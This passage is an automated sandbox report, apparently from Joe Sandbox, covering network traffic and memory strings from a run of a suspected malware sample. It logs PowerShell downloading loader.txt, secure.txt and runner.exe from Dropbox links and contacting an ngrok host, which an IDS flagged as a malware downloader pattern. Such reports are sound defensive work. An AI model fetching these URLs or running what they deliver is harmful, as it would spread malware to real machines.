                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeHTTP traffic: Redirect from: www.dropbox.com to https://uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com/cd/0/get/cgdzz7nrnr2v450qctzug7jzfzzjptshuwjk_9bntk-n3a9qdlp6fao5cfvn4vkm1epxatmh3b3gw9uic3ppivjoa0rt1b_0cr1uwzrnefc69mshlaaccdd4mqbvznfzpglunlw7r_rxs5sb5u1ihlf5/file?dl=1#
                    Source: Joe Sandbox ViewIP Address: 162.125.65.18 162.125.65.18
                    Source: Joe Sandbox ViewIP Address: 162.125.69.15 162.125.69.15
                    Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 162.125.65.18:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49795 -> 162.125.65.18:443
                    Source: global trafficHTTP traffic detected: GET /api/secure/fc08667ad2d7db61431b61a30eb0ffa8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBHN7V4UpDgKe31HldoFFzKutRHjxM9_EBL4DkUaCCtxwkkvlab40YkWDFZ5l4XM2gdR9NDRulR25pRLfkvdAiM_xLltvLXa_RbPE2lJGCd5gVq17lVzdUA4JD5qOjxhe7SyH6B1PnrFyZ7wFjbDf_P/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc31f787c2bb602858cae290072a.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/0hdi5yqluk704whzcrld6/loader.txt?rlkey=b3m23z6tgb7mwwfbcjqi9kumq&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJy1EbV_kkFt7x7pNv4EGcAcGs9ubYKnueanAgdrt18MpOGLByYptKhrOTVO8_-MDxUmiJFR7DlQRry8QaYCflUDCMGIFKMn6OimPUeMReCMy9lrgaEsqLezrEWxuZ7/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucde441054600e534d842ed4b29b.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4VKm1EPXATmH3b3gw9uIc3pPiVJoa0Rt1B_0Cr1uWZrNEfc69mshLAAcCdD4mQBvznFZpGLUNlW7R_rxS5sB5u1iHLf5/file?dl=1 HTTP/1.1Host: uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtb8rqKQvyuiDbpB-VdYP-6ND-6fxABcXlB3tMWgAdfASpXTaeR__Vb9ARDsyMetchbpNKDnaLRETh-2t55upVh299KdSqt_bR33vpX5w1Yp9d5_2bhsHbCKA9YhGbE/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc48b83ada642288f62fac023367.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3hIC7XtKyYfnYQtZl697h631aSu7BMPGgP8e3r3-JuxOvus4lwkahQAIsSoKq1oc0BdrqvfMvNrcfSVb6xuJU3btyi6jDr4ASGY_cplAVpFyHvoNbZGDcUjHMVgbQ/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /api/secure/fc08667ad2d7db61431b61a30eb0ffa8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBHN7V4UpDgKe31HldoFFzKutRHjxM9_EBL4DkUaCCtxwkkvlab40YkWDFZ5l4XM2gdR9NDRulR25pRLfkvdAiM_xLltvLXa_RbPE2lJGCd5gVq17lVzdUA4JD5qOjxhe7SyH6B1PnrFyZ7wFjbDf_P/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc31f787c2bb602858cae290072a.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/0hdi5yqluk704whzcrld6/loader.txt?rlkey=b3m23z6tgb7mwwfbcjqi9kumq&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJy1EbV_kkFt7x7pNv4EGcAcGs9ubYKnueanAgdrt18MpOGLByYptKhrOTVO8_-MDxUmiJFR7DlQRry8QaYCflUDCMGIFKMn6OimPUeMReCMy9lrgaEsqLezrEWxuZ7/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucde441054600e534d842ed4b29b.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4VKm1EPXATmH3b3gw9uIc3pPiVJoa0Rt1B_0Cr1uWZrNEfc69mshLAAcCdD4mQBvznFZpGLUNlW7R_rxS5sB5u1iHLf5/file?dl=1 HTTP/1.1Host: uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtb8rqKQvyuiDbpB-VdYP-6ND-6fxABcXlB3tMWgAdfASpXTaeR__Vb9ARDsyMetchbpNKDnaLRETh-2t55upVh299KdSqt_bR33vpX5w1Yp9d5_2bhsHbCKA9YhGbE/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc48b83ada642288f62fac023367.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3hIC7XtKyYfnYQtZl697h631aSu7BMPGgP8e3r3-JuxOvus4lwkahQAIsSoKq1oc0BdrqvfMvNrcfSVb6xuJU3btyi6jDr4ASGY_cplAVpFyHvoNbZGDcUjHMVgbQ/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; media-src https://* blob: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: gPolicy: frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ 